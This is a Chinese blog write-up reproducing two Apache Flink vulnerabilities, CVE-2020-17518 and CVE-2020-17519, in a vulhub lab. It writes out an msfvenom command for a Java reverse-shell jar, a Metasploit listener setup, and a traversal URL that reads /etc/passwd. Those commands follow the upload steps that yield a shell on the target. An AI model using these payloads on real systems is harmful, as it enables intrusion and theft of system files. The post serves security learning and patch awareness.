【CVE】CVE-2020-17518 & CVE-2020-17519:Flink 任意文件上传 & 未授权访问

最新推荐文章于 2024-07-22 09:55:00 发布
最新推荐文章于 2024-07-22 09:55:00 发布
阅读量2.5k 收藏 8
点赞数 4
分类专栏: CVE 文章标签: flink 安全 apache
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43427482/article/details/124666156
版权
  • 起序:漏扫完看报告的时候发现的,复现学习一下。

一、靶场环境

使用的是 github 上的 vulhub 环境。因为 Flink 中的 CVE-2020-17518CVE-2020-17519Flink/1.11.2 版本都存在。

请添加图片描述

1、漏洞描述:任意文件上传 & 未授权访问

CVE 编号名称危害
CVE-2020-17518任意文件上传应用系统在文件上传功能处对用户上传文件类型、格式、内容等做合法性校验,
导致攻击者可以上传Webshell(.php、.jsp、asp等)恶意脚本文件,
从而可能导致在远程服务器上执行任意恶意脚本文件,从而直接获取应用系统权限。
CVE-2020-17519未授权访问未授权访问可以理解为需要安全配置或权限认证的地址、授权页面存在缺陷,
导致其他用户可以直接访问,从而引发重要权限可被操作、数据库、网站目录等敏感信息泄露。

2、影响版本范围

CVE 编号影响版本范围
CVE-2020-17518Apache:Apache Flink: 1.5.1 - 1.11.2
CVE-2020-17519Apache:Apache Flink: 1.11.0, 1.11.1, 1.11.2

二、搭建环境

1、启动环境

自行安装 vulhub

# Run environment		运行环境
docker-compose up -d

请添加图片描述

2、访问

  • http://192.168.2.129:8081/

请添加图片描述

三、漏洞利用

1、CVE-2020-17518

任意文件上传:Apache Flink 1.5.1 引入了REST处理程序,该处理程序允许通过经过恶意修改的 HTTP HEADER 将上传的文件写入本地文件系统上的任意位置。

1、生成 jar 包格式木马

使用的 kali 中的 msfvenom 工具。生成的文件所在目录自定义,我是放在了 root 用户目录。

msfvenom -p java/shell_reverse_tcp lhost=192.168.2.130 lport=1314 -f jar >~/1.jar

请添加图片描述

2、启动 msf 监听
msfconsole
# 设置监听模块
use exploit/multi/handler
# 设置 payload
set payload java/shell_reverse_tcp
# 设置监听 IP 地址
set lhost 192.168.3.130
# 设置监听端口
set lport 1314
# 执行
exploit

请添加图片描述

3、上传文件

根据下面顺序依次操作。

请添加图片描述

4、获取到反弹的 shell

当上一步点击了 Submit 之后,在 msf 监听这里,稍微等一下,就可以看到已经获取到了靶机反弹的 shell。

请添加图片描述

2、CVE-2020-17519

未授权访问:Apache Flink 1.11.0 中引入的更改(以及1.11.1和1.11.2中也发布)允许攻击者通过 JobManager 进程的 REST接口 读取 JobManager 本地文件系统上的任何文件。访问仅限于JobManager进程可访问的文件。

http://192.168.2.129:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd

请添加图片描述

四、漏洞修复

官方已发布安全版本,请及时下载升级至安全版本。

如果对您有帮助,点个赞再走呗。

边扯边淡
关注
  • 4
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 3
    评论
专栏目录
Apache Flink 文件上传漏洞 (CVE-2020-17518)
qq_50854662的博客
05-22 1200
Apache Flink 文件上传漏洞 (CVE-2020-17518)
Apache Flink漏洞复现(授权访问&上传jar包getshell)
qq_43244584的博客
01-26 4495
Apache Flink漏洞复现(授权访问&上传jar包getshell) 一、Flink简介 Flink核心是一个流式的数据流执行引擎,其针对数据流的分布式计算提供了数据分布、数据通信以及容错机制等功能。基于流执行引擎,Flink提供了诸多更高抽象层的API以便用户编写分布式任务。 二、漏洞介绍 ​ Apache Flink Dashboard默认没有用户权限认证 ​ 攻击者可以通过授权Flink Dashboard控制台 ​ 直接上传木马jar包 ​ 可远程执行任意系统命令获取服务器权限
Apache Flink授权访问-远程代码命令执行-复现
thelostworld
10-24 631
​好久没更新了,今天趁1024更新一篇,最近工作中遇到这个漏洞,今天自己来做一下这个漏洞复现。Apache Flink授权访问-远程代码命令执行-复现一、漏洞简介Apache Flink Dashboard默认没有用户权限认证。攻击者可以通过授权Flink Dashboard控制台,直接上传木马jar包,可远程执行任意系统命令获取服务器权限,风险极大。二、影响版本Apache Flink &...
Apache Flink 授权访问+远程代码执行
Adminxe的博客
11-12 1047
0x00 前言 @Adminxe 今天胖胖表哥突然扔来一个复现,那俺得瞧瞧,正好写个博客划划水,然后就引发了下面一些列的操作以及你想看到的,以及和你不想看到的文字。之前就有大佬复现过,毕竟水文和复现学习,那就来一波吧!最可恶的是,今天的MC兄没有请客喝啵啵奶茶,必须点名批评一下! 从现在fofa的搜索量来看,基本也就是国内Apache Flink 存在1500左右的站点。 有安全研究员公开了一个Apache Flink任意Jar包上传导致远程代码执行的漏洞,影响范围: <= 1.9.1(最..
CVE-2020-17519:Apache Flink 目录遍历漏洞批量检测 (CVE-2020-17519)
05-30
该脚本为Apache Flink 目录遍历漏洞批量检测 (CVE-2020-17519)。 使用方法:Python CVE-2020-17519.py urls.txt urls.txt 中每个url为一行,漏洞地址输出在vul.txt中 影响版本: Apache Flink 1.11.0、1.11.1、...
Apache Flink CVE-2020-17518-id:L.pdf
04-30
Apache Flink CVE-2020-17518--id:L.pdf
flamelu#Vulnerability-1#CVE-2020-17518 Apache Flink 任意文件写入1
07-25
CVE-2020-17518 Apache Flink 任意文件写入影响范围。
Apache Flink目录遍历(CVE-2020-17519)批量检测脚本
09-24
Apache Flink目录遍历(CVE-2020-17519)批量检测工具 2021年1月5日,Apache Flink官方发布安全更新,修复了由蚂蚁安全非攻实验室发现提交的2个高危漏洞,漏洞之一就是Apache Flink目录遍历漏洞(CVE-2020-17519)。 ...
Apache Flink 授权远程代码执行检查
weixin_42299610的博客
06-07 1801
Apache Flink 授权远程代码执行检查
flinkdashboard授权
someInNeed的博客
10-16 1352
访问 http://172.16.150.xx:8084。然后目录在/usr/local/nginx。flinkwebui 增加账号密码。添加配置完成以后,重启nginx,修改flink.conf。配置nginx.conf。
授权访问漏洞合集
m0_49420271的博客
07-24 1054
授权访问漏洞可以理解为需要安全配置或权限认证的地址、授权页面存在缺陷导致其他用户可以直接访问从而引发重要权限可被操作、数据库或网站目录等敏感信息泄露。
Apache Flink jobmanager/logs 目录穿越漏洞 CVE-2020-17519 漏洞复现
Senimo
07-28 917
Apache Flink jobmanager/logs 目录穿越漏洞 CVE-2020-17519 漏洞复现一、漏洞描述二、漏洞影响三、漏洞复现1、环境搭建2、漏洞复现四、漏洞POC五、参考链接 一、漏洞描述 ApacheFlink是一个开源的流处理框架,具有强大的流处理和批处理功能。 Apache Flink 1.11.0 中引入的更改(以及在 1.11.1 和1.11.2 中发布)允许攻击者通过 JobManager 进程的 REST 接口读取JobManager本地文件系统上的任何文件。 访问仅限于
Apache Flink(CVE-2020-17518/17519)任意文件上传和路径遍历漏洞复现
good good study
01-08 3715
目录 影响范围 docker搭建漏洞环境 漏洞复现 单个漏洞检测脚本 批量漏洞检测脚本 Apache Flink 是一个分布式流批一体化的开源平台。Flink 的核心是一个提供数据分发、通信以及自动容错的流计算引擎。Flink 在流计算之上构建批处理,并且原生的支持迭代计算,内存管理以及程序优化。式的数据分析开源系统,结合了分布式 MapReduce 类平台的高效,灵活的编程和扩展性,具有强大的流处理和批处理功能。同时在并行数据库发现查询优化方案。 2021...
剑指架构师系列-ftp服务器
dianlong4020的博客
09-09 108
1、安装FTP 我们在开发项目时,肯定需要专门的一台ftp服务器来存在上传的静态资源,今天我们就在CentOS下搭建一个ftp服务器。 1.安装vsftpd组件,安装完后,有/etc/vsftpd/vsftpd.conf 文件,用来配置,还有新建了一个ftp用户和ftp的组,指向home目录为/var/ftp,默认是nologin(不能登录系统) yum -y in...
gitee 上传jar包_【Apache Flink漏洞复现】授权访问&上传jar包getshell
weixin_29820757的博客
01-18 548
一漏洞介绍Apache Flink Dashboard默认没有用户权限认证攻击者可以通过授权Flink Dashboard控制台直接上传木马jar包可远程执行任意系统命令获取服务器权限二影响范围Apache Flink <= 1.9.1三漏洞检测正文fofa搜索:app="Apache Flink"默认端口为8081poc.pyimport sysimport jsonimpo...
攻击授权访问Flink 集群
3569
08-19 714
Flink 是一个针对流数据和批数据的分布式处理引擎,与 Storm 一起广泛应用于分布式实时计算场景中,且在某些场景下 Flink 性能要优于 Storm。然而 Flink 默认提供的 Web UI 却不支持鉴权,这就引发了非常明显的授权问题。 Flink Web UI 在 macOS 上简单安装一个单节点 Flink,直接使用 Homebrew。 brew install apac...
1、Flink 的 Table API & SQL API 概述
最新发布
猫猫爱吃小鱼粮
07-22 1118
Flink 的 Table API & SQL API 概述
CVE-2020-13249
09-08
根据提供的引用内容,没有包含关于CVE-2020-13249的信息。请提供更多相关信息以便我为您提供准确的答案。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [【漏洞通告】Apache DolphinScheduler高危漏洞(CVE-2020-11974、CVE-2020-13922)](https://blog.csdn.net/weixin_45728976/article/details/108537133)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* [CVE-2020-36179:CVE-2020-36179~82 Jackson-databind SSRF&RCE](https://download.csdn.net/download/weixin_42181545/19185756)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

边扯边淡

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值